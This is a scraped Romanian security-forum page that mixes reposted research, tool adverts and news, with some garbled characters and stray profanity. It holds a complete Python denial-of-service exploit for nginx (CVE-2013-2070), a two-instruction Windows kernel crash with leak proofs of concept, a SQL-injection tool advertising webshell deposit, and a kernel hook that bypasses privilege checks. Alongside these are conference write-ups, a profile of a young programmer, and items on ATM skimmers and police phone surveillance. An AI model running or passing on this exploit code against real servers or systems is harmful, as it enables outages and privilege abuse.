Z:\>kitrap01.exe [+] Kernel image base: 8320c000, size: 413000 [+] Iteration 3d000 / 413000 [+] nt!KiFastCallEntry address: 83249790 Z:\>kitrap0e.exe [+] Kernel image base: 8320c000, size: 413000 [+] Iteration 3d000 / 413000 [+] Leaked address: 8324984c [+] Leaked address: 83249887 [+] Iteration 41000 / 413000 [+] Leaked address: 8324d4ed [+] Iteration 412000 / 413000 “Crashing Windows and leaking bits” – the primary focus area of the overall talk. As it turns out, the nt!KiTrap0e #PF trap handler trusts the KTRAP_FRAME.Ebp field to be a valid kernel-mode pointer when processing faults occuring at a specific, magic Eip values. Again, due to lack of proper KTRAP_FRAME.SegCs sanitization, it is possible to craft a frame with controlled Eip and the user-mode Ebp register, allowing a local attacker to crash the system via an invalid memory reference, or otherwise disclose the least significant bit of any byte in the kernel address space.The two instructions capable of crashing all 32-bit Windows NT-family systems as of today are as follows: [h=1]xor ebp, ebp[/h] [h=1]jmp 0x8327d1b7[/h] where 0x8327d1b7 is the nt!KiSystemServiceAccessTeb address. Proof of Concept source code: kitrap0e_bsod.zip (0.5kB, ZIP), kitrap0e_leak_bits.zip (1.4kB, ZIP) and kitrap0e_addr_space.zip (1.5kB, ZIP). The programs unconditionally crash the operating system, allow disclosing specific bits of the kernel memory and scan the kernel address space layout, respectively. Sursa: NoSuchCon’13 and crashing Windows with two instructions | j00ru//vx tech blog

Mi-as pula-n ofertele voastre.

Geniilor: https://rstforums.com/forum/external.php?type=RSS2&forumids=59

Sa vedem ce o sa iasa... Sa va vad: https://rstforums.com/forum/oferte.rst

[h=1]jSQL Injection v-0.4 : a java tool for automatic database injection[/h] May 21, 2013 · by Terry Update jSQL Injection v-0.4 : a java tool for automatic database injection. Version 0.4 features: GET, POST, header, cookie methods Normal, error based, blind, time based algorithms Automatic best algorithm selection Multi-thread control (start/pause/resume/stop) Progression bars Shows URL calls Simple evasion Proxy setting Distant file reading Webshell deposit Terminal for webshell commands Configuration backup Update checker Admin page checker Brute forcer (md5 mysql…) Coder (encode decode base64 hex md5…) Supports MySQL jSQL Injection is a lightweight application used to find database information from a distant server. jSQL is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris). Next work: + distant table writing [sqli] + distant file writing [sqli] + reverse tcp shell deposit [sqli] + right elevation [sqli] + speed increase (non encoding pass): 50% faster [sqli] + control all running tasks in a tab [gui] # speed test comparison with other injection tools [dev] # automatic code testing (JUnit) [dev] # wiki pages [site] Download : jsql-injection-v0.4.jar (1.2 MB) Find Other Version | Sources : https://code.google.com/p/jsql-injection/ Our Post before : Update jSQL Injection v-0.3 : a java tool for automatic database injection. Sursa: Update jSQL Injection v-0.4 : a java tool for automatic database injection.

[h=1]Micul geniu din Hackerville care a cucerit SUA[/h] Vezi galeria foto Povestea românului care a refuzat ofertele de la Google. Toat? lumea îl ?tie pe Ionu? Budi?teanu de la televizor, din ziare sau din pove?tile despre „ce inven?ii au mai f?cut românii“. De fapt, pu*?ini îl cunosc personal, fiindc? petrece aproape 16 ore pe zi la computer, inventând programe pentru care a primit peste o sut? de premii. Nu merge în parc, nu iese la bere cu prietenii, iar ultima carte citit? a fost în clasa a doua. Nu îi pare r?u, deoarece informatica însumeaz?, pentru el, toate pasiunile posibile. Atunci când m-am întâlnit prima oar? cu Ionu?, ?tiam doar c? este un geniu – cel pu?in a?a îl descriseser? cei care îl întâlniser? pân? în acel moment. El nu spune acela?i lucru, se prezint? drept „un copil care înva?? mult“. Mai ?tiam despre el c? a inventat un program cu ajutorul c?ruia persoanele nev?z?toare reu?esc s? disting? obiecte, c? a fost curtat de cele mai mari universit??i din SUA ?i c? a impresionat jurii nenum?rate cu proiectele sale. Din mailurile schimbate înainte s? ne cunoa?tem oficial, mi-am închipuit c? este o persoan? foarte politicoas?. ?i nu m-am în?elat. Ionu? folose?te pronumele de polite?e, spune „Mul?umesc!“ cât poate de des ?i poveste?te despre proiectele lui modest, calm, dar sigur pe el. Dup? o discu?ie în care mi-a explicat cum func?ioneaz? inven?iile sale, a scos dintr-un rucsac un teanc de diplome. Cam 130. „Am adus ?i ni?te diplome de la concursurile la care am participat“, îmi spune el calm. Prima pe care am observat-o era una oferit? de Universitatea Yale. Au urmat alte câteva din Taiwan, Azerbaidjan, Olanda ?i lista continu?. Mi-a spus c? a participat de 13 ori la concursuri în str?in?tate ?i la multe altele în ?ar?. Are doar 18 ani, iar aventura concursurilor a început din clasa a V-a. Pasiunea pentru computer ?i tot ce poate face cu ajutorul lui, mult mai devreme. Ionu? a v?zut primul computer la 3 ani. P?rin?ii lui împrumutaser? cuiva o sum? de bani, pe care respectivul nu a reu?it s? o dea înapoi. În schimb, le-a oferit un Pentium 386. „Mai era un singur alt computer în tot ora?ul la vremea aceea“, glume?te el. De?i în Râmnicu-Vâlcea, ora?ul unde locuie?te ?i acum, nu existau multe astfel de aparate pe care s? înve?e cum se utilizeaz?, asta nu l-a oprit s? observe singur cum func?ioneaz?. A început s? experimenteze jocuri de toate tipurile. Î?i aminte?te c? la 4 ani ?tia s? î?i salveze singur jocul, recuno?tea cuvintele ?i comenzile care îl ajutau s? fac? asta ?i nu se dezlipea de noua juc?rie. Au urmat peste 1.000 de jocuri pe care le cump?ra de pe Internet, pân? când ?i-a dat seama c? trebuie s? treac? la urm?torul nivel. Se plictisise, iar acum voia s? inventeze jocurile, nu s? le joace. A?a c?, în clasa a III-a, a încercat s? î?i fac? propriile jocuri, documentându-se din instruc?iunile celor cunoscute, din documenta?iile aplica?iilor ?i din c?r?i de specialitate. De?i toate aceste documente nu erau în limba român?, spune relaxat c? „în?elegeam ce citeam, doar aveam sistemul de operare în englez?“. Era interesat de anima?iile 3D, iar în vremea aceea St?pânul Inelelor f?cea furori la capitolul acesta. A încercat ?i el s? creeze lucruri asem?n?toare ?i a reu?it s? realizeze explozii, personaje, îns? nu le-a putut anima. Pentru pu?in timp a crezut c? poate nu i se potrive?te ceea ce încearc? s? fac?. A continuat s? experimenteze aplica?ii, s? încerce s? înve?e cum func?ioneaz?. În timpul acesta, colegii lui de la ?coal? înv??au s? foloseasc? Microsoft Word ?i Excel, iar profesoara de informatic? îl ruga s? îi transcrie documentele, pentru c? tasta rapid. El îi ar?ta ?i ce lucra singur, îns? ea nu îl credea. Nici din clasa a V-a lucrurile nu au fost foarte simple. Înv??a un nou limbaj de programare, bazat în special pe transpunerea problemelor de matematic? distractiv? în informatic?, ceea ce îl interesa mai pu?in decât efectele 3D, anima?iile sau alte aplica?ii. Pentru a-i capta aten?ia, profesoara îi promitea c? îl ajut? s? finalizeze jocul la care lucra, dac? face ?i ce era în programa ?colar?. A acceptat, dar asta nu îl oprea ca acas? la el s? continue munca de programare. Din când în când îi mai aducea profesoarei sale câte un CD cu ce lucrase. „Dumneaei era nedumerit? cum de f?ceam eu aplica?iile ?i nu ?tiam de fapt instruc?iuni de baz?. Nu prea m? credea când vedea ce f?ceam eu“, spune el râzând. În gimnaziu, Ionu? se transformase în varianta modern? ?i tehnologizat? a personajelor de poveste, care cre?teau într-un an cât al?ii în 10. El acumula informa?ii mai rapid decât al?i colegi ?i inventa programe de zor. A început s? mearg? la concursurile na?ionale de informatic?, unde aplica ce înv??a la ?coal?, dar nu î?i p?r?sea nici pasiunile. Înv??a acas?, singur, din lucr?ri academice de informatic?, tratate sau alte lucruri neinteresante pentru copiii de vârsta lui. Nu mai ie?ise în fa?a blocului s? se joace de la nou? ani. Nu sim?ea nevoia, informatica îi ocupa timpul a?a cum îi pl?cea. „Câteodat? adormeam cu capul pe tastatur? ?i m? trezeam a doua zi diminea?a.“ „Nu te certau p?rin?ii c? stai prea mult timp la computer?“, îl întreb. „Nu m? certau. ?i-au dat seama c? eu nu m? mai jucam, dar foloseam util timpul. Computerul este un instrument pentru a face bani sau pentru a te dezvolta pe tine însu?i.“ La ?coal? începuse s? se diferen?ieze de ceilal?i colegi ai lui. Încerca s? vin? mereu cu laptopul sau cu c?r?i de specialitate în sala de clas?, pentru a nu pierde niciun moment de studiu. „Ionu? mi-a atras aten?ia pentru c? era singurul din clas? absorbit de c?r?i de informatic? în timpul pauzelor “, poveste?te profesoara sa de matematic?, Irinel Dafincescu. Ea l-a cunoscut atunci când era în clasa a VII-a. Se preg?tea pentru olimpiadele na?ionale ?i i-a cerut ajutorul profesoarei sale pentru câteva nel?muriri pe care le avea la matematic?. De atunci, Irinel Dafincescu a devenit un profesor important pentru Ionu?. Îl încuraja la fiecare concurs la care participa. „Dup? ce a venit înc?rcat cu premii interna?ionale, de o importan?? covâr?itoare, nu s-a schimbat nimic în felul lui de a fi, nu se vedea nicio urm? de arogan?? în comportamentul s?u ?i a continuat s? lucreze cu aceea?i st?ruin??“, î?i aminte?te profesoara de matematic?. În clasa a IX-a, a trecut la un nivel superior cu proiectele la care lucreaz? – a mers, pentru prima dat?, în SUA. În stilul veni, vidi, vici, a câ?tigat de la început premiul I din partea Association for Computing Machinery (ACM), cea mai mare asocia?ie ?tiin?ific? ?i academic? din domeniul Informatic?. ACM ofer? Premiul Turing, adic? versiunea Nobel pentru informatic?, la gala c?ruia Ionu? a luat unul dintre cele 12 premii oferite în acel an. Era cel mai tân?r dintre cei 12, singurul care nu avea, înc?, o carier? academic? în cercetare. Între timp s-a obi?nuit s? fie cel mai mic de la concursurile la care participa, mai ales în clasa a IX-a sau a X-a, când to?i ceilal?i erau în clasa a XII-a. Asta nu îl împiedica s? câ?tige, mai mereu, premii. „Concursurile de genul acesta au peste 1.000 de participan?i“, îmi explic? el, „iar între noi exist? respect, pentru c? ?tim cu to?ii cât am muncit“. Respectul este, dup? cum mi-a dat de în?eles, foarte important pentru Ionu?. „Nu conteaz? ce vârst? ai, conteaz? cine e?ti“, mi-a spus el odat?, când am încercat s? îl conving s? mi se adreseze la persoana a doua, singular, întrucât nu sunt cu mul?i ani mai mare decât el. Succesul din prima c?l?torie în State i-a adus o invita?ie din partea Universit??ii din San Francisco pentru a deveni studentul lor chiar de atunci, de?i era doar în clasa a noua. Ionu? nu a fost de acord. „Eram prea mic, a? fi fost prea departe de p?rin?i“, îmi spune el zâmbind. Crede c? nu ar fi trebuit s? ard? etapele ?i c? ?coala i-a fost util?. De?i se ocup? exclusiv de informatic? ?i nu mai are timp ?i pentru alte materii, îmi spune c? ?coala i-a ar?tat cum s? înve?e. ?i, dup? cum era de a?teptat, internetul îi e un bun prieten ?i pentru a înv??a, a?a c? este un perseverent autodidact, folosind cursuri online de biologie, fizic? sau alte zone de interes. Dac? la început utiliza cursuri de la masterate, acum studiaz? singur lucr?ri complicate de doctorat. Dup? premiile ?i experien?ele americane a devenit membru ACM ?i IEEE, cele mai mari asocia?ii de profil din lume. A fost premiat de Intel în repetate rânduri ?i invitat de Google Elve?ia s? lucreze pentru ei, atunci când era în clasa a XI-a, îns? i-a refuzat. „Nu vreau s? fiu unul dintre cei 7.000 de programatori care s? lucreze la fel“. Crede c? este mai util pentru umanitate dac? zece programatori ?i-ar uni for?ele s? lucreze în cercet?ri inovative. Î?i dore?te s? devin? profesor universitar, iar propunerile alternative nu îl atrag. Î?i d? seama c? entuziasmul ?i poten?ialul s?u s-ar pierde în munci birocratice sau în locuri în care mai important este marketingul decât cercetarea în informatic? sau în inteligen?? artificial?. Cel mai cunoscut ?i premiat dintre proiectele sale a fost programul care îi ajut? pe nev?z?tori s? disting? obiectele. Inspirat de unchiul s?u, care î?i pierduse vederea de mul?i ani, ?i-a dorit s? creeze un dispozitiv ieftin, prin care s? le fie de folos celor cu aceast? suferin??. Înainte de asta c?p?tase experien?? în domeniul inteligen?ei artificiale, lucrând la un encefalograf ?i citind studii nenum?rate de pe internet. ?i-a dat rapid seama c? organul care poate transmite creierului semnale în mod similar în care o fac ochii este limba. A creat, deci, un soft multifunc?ional ?i un dispozitiv care se pune pe limb?, prin care, practic, persoana nev?z?toare recunoa?te diferite obiecte. Ionu? a testat inven?ia pe unchiul s?u timp de mai multe s?pt?mâni. Cu ajutorul unei camere de filmat surprindea diferite obiecte simple. Dispozitivul proceseaz? informa?ia ?i o transmite la o matrice senzorial? plasat? pe limb?, iar aceast? matrice genereaz? un nivel de electricitate direct propor?ional cu intensitatea imaginii. Prin exerci?iu, creierul se obi?nuie?te ?i începe s? recunoasc? diferite obiecte. Dup? încerc?ri repetate, unchiul lui reu?ea s? disting? chiar ?i o mare parte dintre literele alfabetului. Înainte de acest proiect, Ionu? mai inventase un program prin care s? fie recunoscute fe?ele ho?ilor care folosesc cagule în atacurile lor, lucrase la un soft de recunoa?tere a dezastrelor naturale ?i multe alte proiecte – toate premiate în str?in?tate. De unde ideile pentru aceste lucruri? La concursurile la care particip? atât de frecvent se propun diverse teme, prin care ar putea fi ajutat? lumea. Acum lucreaz? la o ma?in? autonom?. „Adic? un autoturism care merge singur?“, întreb eu, încercând s? verific informa?ia pe care o credeam posibil? numai în filme SF. M? aprob? ?i îmi spune c? va fi a doua ma?in? de acest fel inventat? în lume. Pentru prima au lucrat o mul?ime de cercet?tori de la Stanford. Unul dintre profesorii de acolo a ?inut cursuri despre acest subiect, îns? nu a vândut marele pont, l?sându-i pe cei ca Ionu? s? inoveze. El vrea s? aduc? o îmbun?t??ire acestei ma?ini, realizând-o cu un radar mult mai ieftin decât cel folosit de americani. Acesta din urm? ar fi costat câteva zeci de mii de dolari, pe când al lui ar fi în jur de 2.000. „Vede?i Gauss-ul acesta?“, îmi indic? el, relaxat, cu degetul c?tre ecranul laptopului, unde tocmai îmi ar?ta cum func?ioneaz? mai exact softul ma?inii autonome. Încerc s? în?eleg cum poate o ma?in? s? mearg? singur?, iar r?spunsul pare destul de simplu: aceasta identific? marcajele ?i semnele rutiere, obstacolele ?i curbele ?i reu?e?te s? mearg? f?r? ca noi s? o conducem. Ca s? î?i duc? la bun sfâr?it proiectul, a primit o ma?in? de la Dacia Renault ?i „Funda?ia Dan Voiculescu“. L-am întrebat dac? are permis pentru ea. „Nu am permis, nu m? intereseaz? asta. Eu vreau s? fac o ma?in? care s? mearg? singur?“. La un moment dat, câ?iva dintre profesorii s?i au început s? se întrebe dac? nu cumva genialitatea lui poate fi periculoas?. În vremea în care el se preg?tea de inven?ii care s? ajute umanitatea, în Râmnicu-Vâlcea poli?ia aresta 30 de hackeri pentru fraude informatice grave, poveste din cauza c?reia presa american? i-a dat ora?ului numele de Hackerville. A?a c?, atunci când era în clasa a VIII-a, directorului liceului i s-a cerut s? îi interzic? accesul lui Ionu? în laboratorul de informatic?, „c?ci poate vine FBI-ul la ?coal?“, î?i aminte?te el amuzat. „Acela nu este hacking, este phishing. Este altceva“, m? l?mure?te el despre leg?tura dintre FBI ?i suspiciunile profesorilor s?i. Mi-a explicat c? hackingul înseamn?, de fapt, exploatarea vulnerabilit??ilor site-urilor, ceea ce este foarte u?or. În clasa a VI-a, a vrut s? le arate câteva probleme celor care lucrau la un site românesc, îns? ei nu l-au crezut. Ca s? le demonstreze c? a avut dreptate, a modificat câteva lucruri minore. Speria?i, au vrut s? îl dea în judecat?, îns? Ionu? nu avea pe vremea aceea nici buletin, a?a c? l-au l?sat în pace. Atunci a fost ultima dat? când a încercat ceea ce ar putea fi numit „white hat hacking“. Oamenii nu îl prea cred c? nu se ocup? cu acelea?i lucruri ca ?i acei vâlceni care au f?cut ora?ul celebru în str?in?tate. Unii profesori îi repro*?au în liceu c? programele pe care le inventeaz? nu ar fi adev?rate, c? se „autoplagiaz?“ ?i c?, de fapt, ar fi doar un mic hacker. În liceu, cineva le-a trimis profesorilor mail-uri compromi??toare, iar el a fost primul incriminat. Dar Ionu? nu ar avea timp pentru hacking. „Te-a? putea convinge s? cite?ti o poveste?“, îi propun. „Ah, nu, nu“ – râde el. Prefer? filmele, din care vede maximum 20 într-un an. Filmul preferat, care ar putea avea leg?tur? cu marea sa pasiune, este Terminator, pentru c? aduce în discu?ie nout??ile create de tehnologie în viitor. Spune c? nu î?i pierde timpul cu vizion?ri aleatorii de filme, pentru c? nu ?sta este hobby-ul lui. Unica sa pasiune este informatica, iar singurii s?i prieteni sunt tot cei care au leg?tur? cu subiectul acesta, în general cunoscu?i la concursurile interna?ionale la care merge. „Vrei s? pleci undeva în vacan?? dup? ce termini ma?ina autonom??”, îl întreb eu. Îmi spune c? îi sunt suficiente zborurile în str?in?tate pentru concursuri, acolo are parte de tot ceea ce î?i dore?te. Ultima oar? când am vorbit cu Ionu? se gr?bea s? ajung? acas?, s? mai înve?e. De?i are o burs? de 40.000 de dolari, pe care o poate folosi la orice universitate din State, prefer? s? studieze oricum, pentru c? îi place. Vrea s? mearg? la Carnegie Mellon, pentru c? simte c? i s-ar potrivi mai bine decât Yale sau Stanford. UPDATE: Pe 17 iunie, Ionu? a câ?tigat marele premiu de 75.000 de Euro International Science and Engineering Fair (ISEF), organizat de compania Intel in Arizona, SUA, pentru dezvoltarea proiectului ma?inii autonome. Foto: Ioana V?c?ra?u, Mihai D?sc?lescu Sursa: Micul geniu din Hackerville care a cucerit SUA

Vai, nu imi mai merge RST, primeste DDOS de pe 3 IP-uri

[h=1][cryptography] skype backdoor confirmation[/h]Adam Back adam at cypherspace.org Thu May 16 15:52:24 EDT 2013 So when I saw this article Skype with care – Microsoft is reading everything you write - The H Security: News and Features I was disappointed the rumoured skype backdoor is claimed to be real, and that they have evidence. The method by which they confirmed is kind of odd - not only is skype eavesdropping but its doing head requests on SSL sites that have urls pasted in the skype chat! Now I've worked with a few of the german security outfits before, though not Heise, and they are usually top-notch, so if they say its confirmed, you generally are advised to believe them. And the date on the article is a couple of days old, but I tried it anyway. Setup an non-indexed /dev/urandom generated long filename, and saved it as php with a meta-refresh to a known malware site in case thats a trigger, and a passive html with no refresh and no args. Passed a username password via ?user=foo&password=bar to the php one and sent the links to Ian Grigg who I saw was online over skype with strict instructions not to click. To my surprise I see this two entries in the apache SSL log: 65.52.100.214 - - [16/May/2013:13:14:03 -0400] "HEAD /CuArhuk2veg1owOtiTofAryib7CajVisBeb8.html HTTP/1.1" 200 - 65.52.100.214 - - [16/May/2013:14:08:52 -0400] "HEAD /CuArhuk2veg1owOtiTofAyarrUg5blettOlyurc7.php?user=foo&pass=yeahright HTTP/1.1" 200 - I was using skype on ubuntu, my Ian on the other end was using MAC OSX. It took about 45mins until the hit came so they must be batched. (The gap between the two requests is because I did some work on the web server as the SSL cert was expired and I didnt want that to prevent it working, nor something more script like with cgi arguments as in the article). Now are they just hoovering up the skype IMs via the new microsoft central server architecture having back doored skype client to no longer have end2end encrption (and feedind them through echelon or whatever) or is this the client that is reading your IMs and sending selected things to the mothership. btw their HEAD request was completely ineffective per the weak excuse microsoft offered in the article at top my php contained a meta-refresh which the head wont see as its in the html body. (Yes I confirmed via my own localhost HTTP get as web dev environments are automatic in various ways). So there is adium4skype which allows you to use OTR with your skype contacts and using skype as the transport. Or one might be more inclined to drop skype in protest. I think the spooks have been watching "Person of Interest" too much to think such things are cricket. How far does this go? Do people need to worry about microsoft IIS web servers with SSL, exchange servers? You do have to wonder if apple backdoored their IM client, below the OTR, or silent circle, or the OS - I mean how far does this go? Jon Callas said not apple, that wouldnt be cool, and apple aims for coolness for users; maybe he should dig a little more. It seems to be getting to you cant trust anything without compiling it from source, and having a good PGP WoT network with developers. A distro binary possibly isnt enough in such an environment. Adam Sursa: [cryptography] skype backdoor confirmation

[h=2]Jailed Romanian hacker repents, invents ATM security scheme[/h]Add-on device blocks card skimmers By Neil McAllister in San Francisco Posted in Security, 17th May 2013 20:33 GMT A Romanian man serving a five-year jail sentence for bank-machine fraud says he's come up with a device that can be attached to any ATM to make the machine invulnerable to card skimmers. Valentin Boanta was arrested in 2009 and charged with supplying ATM skimmers – devices that can be attached to ATMs to surreptitiously copy the data from unwitting users' cards – to a local organized crime gang. It was during his subsequent trial and sentencing that Boanta saw the light and traded in his black hat for a white one, Reuters reports. "Crime was like a drug for me. After I was caught, I was happy I escaped from this adrenaline addiction," Boanta told reporters from his jail cell in Vaslui, Romania. "So that the other part, in which I started to develop security solutions, started to emerge." Boanta's solution, known as the Secure Revolving System (SRS), is an ingenious one that uses mechanical rather than digital security. ATM skimmers work by installing a second, concealed card reader over the one that's built into the ATM. When an unsuspecting bank customer inserts a card into the slot, the card's magnetic stripe first runs past the read head of the skimmer, allowing it to copy all of the card's data. The transaction then proceeds as normal and the ATM returns the card to the customer, who is none the wiser. With Boanta's device installed on the ATM, however, that all changes. Customers insert their cards into the slot long side first, so that the magnetic stripe is parallel to the face of the machine. The device then rotates the card 90 degrees into the ATM, where the legitimate card reader scans the magnetic stripe, then rotates it back out again to return it to the customer. That rotation makes it impossible for an add-on skimmer to read the card, because the magnetic stripe never moves in a straight line until it is secure inside the ATM. While awaiting the outcome of his trial, Valentin pitched his idea to Mircea Tudor and Adrian Bizgar of Bucharest-based technology firm MB Telecom, who helped him to patent his idea and funded development of the SRS device. The design would go on to win the International Press Prize at the 41st International Exhibition of Inventions in Geneva, Switzerland, in April. Boanta, however, wasn't available to accept the award. He's currently just six months into his sentence and won't see freedom for another four and a half years. Still, his partners at MB Telecom say all credit for the SRS design should go to him. "He fully deserves such recognition," Tudor told Reuters. "He's taking part in improving Romania's image abroad and he'll surely join our team when released." MB Telecom is currently finalizing details of the commercial version of the device and expects to bring it to market in the second half of the year. ® Sursa: Jailed Romanian hacker repents, invents ATM security scheme • The Register

[h=1]Poli?ia Român? a cump?rat un sistem portabil de monitorizare a telefoanelor mobile de 2,8 milioane de lei[/h]de Adrian Dumitrache Poli?ia Român? va putea localiza, identifica ?i monitoriza telefoanele mobile în re?elele Vodafone, Orange, Cosmote ?i RCS&RDS, printr-un sistem portabil cump?rat de la firma german? SYBORG Informationssysteme cu 2,8 milioane de lei, potrivit www.e-licitatie.ro. "Sistemul folose?te metoda de simulare a unei celule reale a re?elei de telefonie mobil?. Sistemul are mobilitate total? chiar ?i în timpul func?ion?rii, având posibilitatea de instalare pe un autovehicul. Antenele utilizate în cadrul sistemului sunt ascunse vederii, fiind mascate într-un cadru portbagaj auto de plafon", se precizeaz? în caietul de sarcini al licita?iei pentru achizi?ionarea sistemului. Licita?ia a fost ini?iat? în decembrie 2012 ?i atribuit? trei luni mai târziu singurului ofertant, SYBORG Informationssysteme. Potrivit caietului de sarcini, unitatea central? a sistemului este integrat? într-o valiz? de dimensiune maxim? 60x40x30 centimetri ?i are incluse antene directive, notebook, scanner de re?ea ?i acumulatori. De asemenea, unitatea central? poate fi conectat? la antene omnidirec?ionale prin intermediul unui amplificator de re?ea. Cu ajutorul unit??ii centrale, poli?i?tii vor putea s? monitorizeze comunica?iile GSM ?i UMTS prin crearea de celule virtuale cu parametri similari cu cei ai celulelor re?elei reale. Sistemul permite modificarea puterii semnalului cu care telefoanele ?int? emit, colectarea, înregistrarea ?i memorarea într-o baz? de date a codurilor IMSI ?i IMEI, prcum ?i ora ?i data înregistr?rii. Poli?ia Român? a solicitat, prin caietul de sarcini, ?i instruirea a doi angaja?i, proces care va include 40 de ore de curs teoretice ?i practice. Sursa: Poli?ia Român? a cump?rat un sistem portabil de monitorizare a telefoanelor mobile de 2,8 milioane de lei - Gandul

nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2070) # Exploit Title: nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2070) # Google Dork: CVE-2013-2070 # Date: 16.05.2013 # Exploit Author: Mert SARICA - mert [ . ] sarica [ @ ] gmail [ . ] com - http://www.mertsarica.com # Vendor Homepage: http://nginx.org/ # Software Link: http://nginx.org/download/nginx-1.4.0.tar.gz # Version: 1.3.9-1.4.0 # Tested on: Kali Linux & nginx v1.4.0 # CVE : CVE-2013-2070 import httplib import time import socket import sys import os # Vars & Defs debug = 0 dos_packet = 0xFFFFFFFFFFFFFFEC socket.setdefaulttimeout(1) packet = 0 def chunk(data, chunk_size): chunked = "" chunked += "%s\r\n" % (chunk_size) chunked += "%s\r\n" % (data) chunked += "0\r\n\r\n" return chunked if sys.platform == 'linux-i386' or sys.platform == 'linux2': os.system("clear") elif sys.platform == 'win32': os.system("cls") else: os.system("cls") print "======================================================================" print u"nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2070) [http://www.mertsarica.com]" print "======================================================================" if len(sys.argv) < 2: print "Usage: python nginx_dos.py [target ip]\n" print "Example: python nginx_dos.py 127.0.0.1\n" sys.exit(1) else: host = sys.argv[1].lower() while packet <= 5: body = "Mert SARICA" chunk_size = hex(dos_packet + 1)[3:] chunk_size = ("F" + chunk_size[:len(chunk_size)-1]).upper() if debug: print "data length:", len(body), "chunk size:", chunk_size[:len(chunk_size)] try: con = httplib.HTTPConnection(host) url = "/mertsarica.php" con.putrequest('POST', url) con.putheader('User-Agent', "curl/7.30.0") con.putheader('Accept', "*/*") con.putheader('Transfer-Encoding', 'chunked') con.putheader('Content-Type', "application/x-www-form-urlencoded") con.endheaders() con.send(chunk(body, chunk_size[:len(chunk_size)])) except: print "Connection error!" sys.exit(1) try: resp = con.getresponse() print(resp.status, resp.reason) except: print " [*] Knock knock, is anybody there ? (" + str(packet) + "/5)" packet = packet + 1 con.close() print "[+] Done!" Sursa: nginx 1.3.9-1.4.0 DoS PoC

[h=2]SyScan 2013, Bochspwn paper and slides[/h](Collaborative post by Mateusz “j00ru” Jurczyk and Gynvael Coldwind) A few days ago we (Gynvael and I) gave a talk during the SyScan’13 conference in the fine city of Singapore, and as promised (though with a slight delay), today we are publishing both the slide deck and a white paper discussing memory access pattern analysis – a technique we recently employed with success to discover around 50 double-fetch vulnerabilities in Windows kernel and related drivers (Elevation of Privileges and Denial of Service class; see Microsoft Security Bulletins MS13-016, MS13-017, MS13-031 and MS13-036 released in February and April this year. Also, stay tuned for more security patches in May and June). In our SyScan presentation, we explained the concept of kernel race conditions in interacting with user-mode memory, gave a brief rundown on how they can be identified by using CPU-level instrumentation of an operating system session, and later focused on how they can be successfully exploited with the help of several generic techniques (on the example of three Windows vulnerabilities discovered by the Bochspwn project). While we only had the time to go through a single case study (the CVE-2013-1254 vulnerability in win32k!SfnINOUTSTYLECHANGE), both slides and the paper contain a detailed analysis of another local privilege escalation: CVE-2013-1278 in nt!ApphelpCacheLookupEntry, and an amusing case of a double fetch behavior (it is not clear if it can be classified as a bug) found in the default kernel implementation of the standard nt!memcmp function, as a bonus. We hope you will enjoy both the slides and whitepaper – considering the amount of time we have dedicated to the research, we would really appreciate your feedback. Download: Slides: “Bochspwn: Exploiting Kernel Race Conditions Found via Memory Access Patterns” (3.1MB, PDF) Paper: “Identifying and Exploiting Windows Kernel Race Conditions via Memory Access Patterns” (1.0MB, PDF) Please note that we are not releasing the Bochspwn project at this time – we are planning to open-source it later this year. On the other hand, the demo videos for the CVE-2013-1254 and CVE-2013-1278 vulnerabilities shown during the talk are now available online: The SyScan event itself was really fun – the speaker line-up was one of the best ones we have seen this year, ensuring high technical quality of the talks (which they were in fact quite inspiring), with nothing lacking on the organizational side. We were also positively surprised by the city-state of Singapore – it’s really a modern, clean and friendly place! We had a great time there and hope to visit it again soon Sursa: SyScan 2013, Bochspwn paper and slides | j00ru//vx tech blog

[h=2]FindMyHash[/h] Often in penetration tests we discover password hashes. In this situation every penetration tester use the password cracking tool of his convenience ( like john the ripper) in order to crack the hashes offline and to escalate privileges. The sooner that the hash cracks the better for the results of the engagement as the penetration tester will have more time to search on the system for other important things while he has a valid password. For that reason a script created that allows the penetration tester to crack hashes using free online services or even Google if the hash is common. The usage of the script is very simple and it can be seen below: FindMyHash Script in action This is definitely something that every penetration tester should check before he starts the process of cracking a hash. Author: https://twitter.com/laXmarcaellugar Email: bloglaxmarcaellugar@gmail.com Script: findmyhash - Python script to crack hashes using online services - Google Project Hosting Sursa: FindMyHash | Penetration Testing Lab

Visual DuxDebugger is a 64-bit debugger disassembler for Windows, especially useful when source code is unavailable. The user interface is very intuitive so it makes very simple any task in reverse engineering, you can edit code, registers, and memory. Visual DuxDebugger provides wide information about the process being debugged, showing all loaded modules with all exported functions, call stack, threads and much more. The main difference with others debuggers is that Visual DuxDebugger can debug child-processes and multiple-processes. Software Reverse Engineering is commonly used: · As a learning tool to understand undocumented APIs. · As a way to make new compatible products. · For making software interoperate more effectively. · To bridge different operating systems or databases. · To analyze possible spyware / malware. · To uncover and exploit vulnerabilities. · To audit software. · To fix complex bugs. · For litigation support. Download: http://www.duxcore.com/index.php/prod/visual-duxdebugger/overview

[h=1][Kernel Hack] Hooking SeSinglePrivilegeCheck to bypass privilege checks[/h] [h=3]zwclose7[/h] Recently, I written a driver that hook the SeSinglePrivilege function. SeSinglePrivilegeCheck is a kernel mode function used to perform privilege checks. Some functions, such as NtLoadDriver and NtShutdownSystem, use the SeSinglePrivilegeCheck function to check for required privilege. For example, NtLoadDriver will use SeSinglePrivilegeCheck function to check for the SeLoadDriverPrivilege, and will return STATUS_PRIVILEGE_NOT_HELD if the caller do not have the SeLoadDriverPrivilege enabled. The NtShutdownSystem function also use SeSinglePrivilegeCheck function to check for SeShutdownPrivilege, and will return STATUS_PRIVILEGE_NOT_HELD if the caller do not have the SeShutdownPrivilege. Privilege checks are only performed if the caller is from user mode. If the caller is from kernel mode, the system will not perform the privilege checks. My hook driver will hook the SeSinglePrivilegeCheck function to cause the function to always return TRUE to the caller. By hooking the SeSinglePrivilegeCheck function, all privilege checks will be bypassed. In the following video, I will test my hook driver on a virtual machine with Windows XP installed. I will use the WinAPIOverride to call the NtShutdownSystem function in the explorer.exe process. The first call failed with STATUS_PRIVILEGE_NOT_HELD because the explorer.exe process do not have the SeShutdownPrivilege enabled. After loading the hook driver, the SeSinglePrivilegeCheck function will be hooked, and all privilege checks will be bypassed. The second NtShutdownSystem call succeed even the caller do not have the SeShutdownPrivilege enabled because the privilege check has been bypassed, and the NtShutdownSystem function successfully shutted down the virtual machine. Download src: 